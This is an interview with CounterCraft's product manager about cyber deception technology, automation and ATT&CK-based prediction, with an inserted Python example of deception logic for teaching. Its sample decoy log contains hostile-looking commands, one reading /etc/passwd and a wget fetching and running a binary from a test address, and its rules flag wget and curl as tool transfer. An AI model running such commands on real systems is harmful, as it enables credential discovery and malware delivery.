“We’re small children at heart: we love taking things apart and putting them back together! Sometimes we can’t put it back together, but that’s all part of the fun.”
A passion for process and a hacker mentality have enabled Product Manager Richard Barrell to take CounterCraft from an MVP to a full spectrum cyber deception platform in a matter of years. Combining active and passive automation, predictive analysis and a focus on human interaction, the platform’s industry-shaping deception technology might just be the Trojan Horse we need to catch up with threat actors. Historically cyber defenders have been a step behind, but deception is closing the gap.
In our interview with Richard, he explains how the platform is responding to the shifting cyber landscape - and lets us in on some exciting product developments the company has in the pipeline.
How did you end up working in cyber security, and what is it you love about the industry?
I started off working in the finance sector in London way back in the 90s checking firewalls! So I’ve worked in the industry for over 20 years. Security is fascinating because there’s an element of attack and defence, of us and them, of puzzle solving. The industry tends to attract the type of person I find interesting to work with - someone with an enquiring, curious mind. We’re small children at heart: we love taking things apart and putting them back together! Sometimes we can’t put it back together, but that’s all part of the fun. It’s the hacker mentality.
What would you say you’re most passionate about? Apart from the CounterCraft platform, of course!
As boring as it sounds, I love creating new processes (blame it on my background in mechanical engineering). I’ve seen CounterCraft move from a startup to a mature commercial organisation, and a large part of that is due to the fact that we’re getting the processes right.
What’s the coolest thing you’re working on right now?
There are two things. The first is that we’re battering the product to make sure it can withstand all sorts of complicated scenarios. It’s a type of product testing we run to see where the product’s weaknesses are. The second is UX. We’re taking a step back from the platform in order to assess the processes involved so we can streamline the user experience.
Deception is a fairly recent cyber security tool. What technological advances over the last few years have made deception platforms possible?
Deception has existed since the dawn of time, so the method itself isn’t new, but its use in the cyber security industry is. Deception isn’t so much a tool as an approach - a series of technologies. It’s both the technologies themselves and the new ways we can control them that have paved the way for deception in cyber. The increased use of the cloud, for example, means that we can adopt and deploy new technologies quickly, interlink lots of disparate components and command and control devices remotely.
What is it that sets CounterCraft’s platform apart from others in the market?
We are the only platform that truly provides full spectrum deception, which means we can operate outside companies’ network environments. Just as you could find information about a person by rifling through their bin (excuse the metaphor!), attackers will explore “dumpsters” that we can fill with fake information and bury in the cloud, in QR codes, USB keys, etc.
This cloud of misinformation not only sets potential traps away from the data we need to protect, but also gives us vital information about attackers’ TTPs (Tools, Techniques, Procedures). Unlike other platforms, we always use real software and real tools because if the traps aren’t credible, attackers won’t fall for them.
SC Magazine recently recognised our platform as Best Buy because of the focus on quality assurance, functionality and intelligence gathering. That was a proud moment for us!
How has the rise of automation changed the way we’re able to deceive and intercept attackers? And how important is automation to the CounterCraft platform?
Automation is absolutely key to everything we do, but it’s one of the least publicised aspects of our platform. We use a mix of passive and active automation in order to gather and process data on the attacker and interact with them. Our passive automation technology monitors attackers’ movements in the deception environment and extracts key observables (binaries, commands, IP addresses, etc) in a useable format.
Active automation is what we call “deception logic” - we pull on known patterns to automate a response on an if/then framework (“if someone does X, then we can do Y”). We’ve expanded the number and range of “if” scenarios that trigger responses, but we’re now improving complex events correlation technology. Basically that means that it’s no longer just a single event but also a series of events over time that can trigger an automated response. One of the big obstacles to the adoption of deception in the past was the management overheads - both in terms of cost and personnel - as “honeypots” required almost one-to-one management. Our automation technology removes these overheads.
The cyber security industry has spent years trying to get ahead of the attackers. Do you think deception is the tool we’ve been missing?
As defenders it can sometimes feel like we’re always a step behind, playing catch-up with the attackers, but I do think deception is a way of closing the gap. It is not always possible to stop an attack, but being able to figure out who is attacking, how they are acting and what they are looking for is essential data to defend networks, systems and data.
How critical is the data generated by the platform in predicting an attacker’s next move?
Extremely critical! As we discussed in relation to automation, data allows us to understand and increase the probability of predicting an attacker’s next move. Predictive analysis means we can classify and map behaviours and trigger events against existing patterns of known threat actors captured in frameworks like the MITRE ATT&CK™ knowledge base. Frameworks like ATT&CK mean that for the first time, we have a standard way of talking about Indicators of Compromise. Data helps inform successful cyber defence strategies because knowing what an attacker is after will condition our response - they might be looking for data a company isn’t currently protecting, for example.
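The three answers above describe a pipeline: passive automation pulls observables (commands, binaries, IP addresses) out of what the attacker does in the deception environment, the behaviour is classified against known patterns such as ATT&CK techniques, and deception logic fires an if/then response either on a single event or on a series of events over time. The script below is an added illustration of that pipeline and is not CounterCraft's code: the log format, the decoy host name `decoy-01`, the addresses (RFC 5737 test ranges), the hash placeholder, the command-to-technique mapping and the rule set are all constructed for the example.

```python
"""Toy deception-logic pipeline (added example, not CounterCraft's code).
Stage 1 (passive): parse decoy logs into observables.
Stage 2: tag each event with a behaviour type and, where obvious, an ATT&CK technique ID.
Stage 3 (active): if/then rules on single events plus a sequence rule that only
fires when several events occur in order within a time window."""
import re
from datetime import datetime, timedelta

# Constructed sample log from a hypothetical decoy host; every value here is made up.
SAMPLE_LOG = """\
2023-05-01T10:00:01Z decoy-01 sshd: Accepted password for backup from 203.0.113.7
2023-05-01T10:00:09Z decoy-01 shell: user=backup cmd="cat /etc/passwd"
2023-05-01T10:00:20Z decoy-01 shell: user=backup cmd="ls -la /srv/finance"
2023-05-01T10:00:41Z decoy-01 shell: user=backup cmd="wget http://198.51.100.5/x.elf"
2023-05-01T10:00:55Z decoy-01 exec: user=backup binary=/tmp/x.elf sha256=CONSTRUCTED-HASH
"""
# Same session, but the execution comes twelve minutes after the login (outside the window).
SLOW_LOG = SAMPLE_LOG.replace("10:00:55Z decoy-01 exec", "10:12:55Z decoy-01 exec")

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<src>\w+): (?P<msg>.*)$")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
CMD_RE = re.compile(r'cmd="([^"]*)"')
BIN_RE = re.compile(r"binary=(\S+)")


def parse_line(line):
    """Passive stage: turn one log line into a dict of observables, or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    msg, cmd, binary = m["msg"], CMD_RE.search(m["msg"]), BIN_RE.search(m["msg"])
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"), "host": m["host"],
            "src": m["src"], "msg": msg, "ips": IP_RE.findall(msg),
            "command": cmd.group(1) if cmd else None, "binary": binary.group(1) if binary else None}


def classify(ev):
    """Map an event to (behaviour type, ATT&CK technique ID or None).
    The mapping is a hand-picked illustration, not a complete ATT&CK model."""
    first = (ev["command"] or "").split()[:1]
    if ev["src"] == "sshd" and "Accepted" in ev["msg"]:
        return "login", "T1078"          # Valid Accounts
    if (ev["command"] or "").startswith("cat /etc/passwd"):
        return "discovery", "T1087"      # Account Discovery
    if first == ["ls"]:
        return "discovery", "T1083"      # File and Directory Discovery
    if first in (["wget"], ["curl"]):
        return "tool_transfer", "T1105"  # Ingress Tool Transfer
    if ev["src"] == "exec":
        return "execution", None         # left for the analyst to map
    return "other", None


# Active stage: "if someone does X, then we do Y" for single events ...
SINGLE_RULES = {"tool_transfer": "capture_binary_and_snapshot_decoy"}
# ... and for an ordered series of events inside a time window.
SEQUENCE_RULES = [(("login", "discovery", "execution"), timedelta(minutes=5), "escalate_to_analyst")]


def sequence_matches(history, pattern, window, now):
    """True if events of the pattern's types appear in order within [now - window, now]."""
    idx = 0
    for ts, etype in history:
        if ts < now - window:
            continue                     # too old to count towards this sequence
        if etype == pattern[idx]:
            idx += 1
            if idx == len(pattern):
                return True
    return False


class DeceptionLogic:
    def __init__(self):
        self.history = {}  # host -> list of (timestamp, behaviour type)

    def observe(self, ev):
        """Feed one event; classify it and return the responses it triggers."""
        ev["type"], ev["technique"] = classify(ev)
        hist = self.history.setdefault(ev["host"], [])
        hist.append((ev["ts"], ev["type"]))
        fired = []
        if ev["type"] in SINGLE_RULES:
            fired.append((ev["host"], ev["type"], SINGLE_RULES[ev["type"]]))
        for pattern, window, response in SEQUENCE_RULES:
            # Evaluate only when the newest event completes the pattern, so a sequence fires once.
            if ev["type"] == pattern[-1] and sequence_matches(hist, pattern, window, ev["ts"]):
                fired.append((ev["host"], "sequence:" + ">".join(pattern), response))
        return fired


def run(log_text):
    """Process a whole log; return (classified events, triggered responses)."""
    engine, events, responses = DeceptionLogic(), [], []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is not None:
            events.append(ev)
            responses.extend(engine.observe(ev))
    return events, responses


if __name__ == "__main__":
    for e in run(SAMPLE_LOG)[0]:
        print(e["ts"].isoformat(), e["type"], e["technique"], e["ips"], e["command"] or e["binary"])
    print(run(SAMPLE_LOG)[1])
```

Running it on `SAMPLE_LOG` fires the single-event rule as soon as the download is seen and the sequence rule when the execution completes login, discovery and execution inside five minutes; on `SLOW_LOG` the execution falls outside the window, so only the single-event response fires. The per-host history and the "fire only when the last step arrives" check are the two details that keep a sequence rule from re-triggering on every later event.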
How vital is collaboration and the sharing of information within the industry if we’re to reduce the number of cyber attacks?
Attackers don’t use custom tools or techniques - they run scripts and have generic approaches, so data sharing platforms like MISP are crucial in formalising and analysing what is happening. John Donne’s classic line, “no man is an island” definitely rings true in cyber. Sharing data within the industry might not reduce the number of attacks, but it improves our response to them.
What do you think is the biggest challenge currently facing the cyber security industry?
The biggest challenge facing the cyber security industry is the external pressure that’s now at play as a result of data protection initiatives like the GDPR. These policies have put enormous pressure on companies as there are now large fines for very small breaches, but our information is everywhere and it’s increasing in value, so it’s getting harder and harder to protect it. That’s why platforms like CounterCraft’s are so important. They allow professionals to automate functions, deploy new tools and get an additional level of protection which can help ameliorate the pressure the industry is facing.
How do you envisage CounterCraft’s platform evolving and responding to the shifting cyber security landscape and wider industry trends such as Industry 4.0 and AI?
Personally I think there’s quite a lot of hype around AI! I might be living in blissful ignorance, but I don’t think it will dramatically change our lives in the short term. We incorporate machine learning into our deception platform, which allows us to spot patterns in data, but I think we’re still a way off from fully-fledged AI.
We have a clear vision for our product, so we’re not strongly influenced by trends outside of our customers’ industries. Industry 4.0 is something that affects our customers in the manufacturing industry, as it increases the attack surface area and therefore the risk of attacks. We’re responding to this by providing a way for companies to deploy deception within an industry environment.
Do you have any more exciting product developments in the pipeline?
The areas we’re focusing on at the moment are the platform’s usability and the number of deception assets it incorporates, for example the ability to detect, alert and react to a series of events. Human interaction is another big trend we’re utilising in new versions of the platform in order to make sure the deception environment is as credible as possible. We incorporate footprints and tell-tale signs like recent logins and recently used documents in order to make it look like the operator has just stepped away for a cup of tea.
Now tell us, what is a Brit doing in San Sebastian?
I blame my partner! We met during our Erasmus year in Germany. She’s from the Basque Country and persuaded me to move here 17 years ago.
We heard you speak five languages, is that true?
It is true! I speak English, German and Spanish fluently, have an almost-conversational level of French and an improving level of Basque. I also have a few phrases in Greek, Hebrew and Welsh…
You’re just showing off now! Do you think having a team with different cultures, backgrounds and perspectives improves CounterCraft’s product?
More than the variety of cultures in the CounterCraft office, I would say it’s the different age groups that most positively impact the platform. Cyber security is one of the few industries where youth is not a barrier, and the fresh perspectives and ideas that young people bring to the table are crucial in IT.
We have people as young as 19 from very different backgrounds working as part of placement years and apprenticeships, and our flat culture means everyone has an input and all ideas are valued equally, which is what has enabled us to go from strength to strength. In just a few years, we’ve moved from an MVP to a polished, refined, commercial product - and I’m very happy to be part of the journey!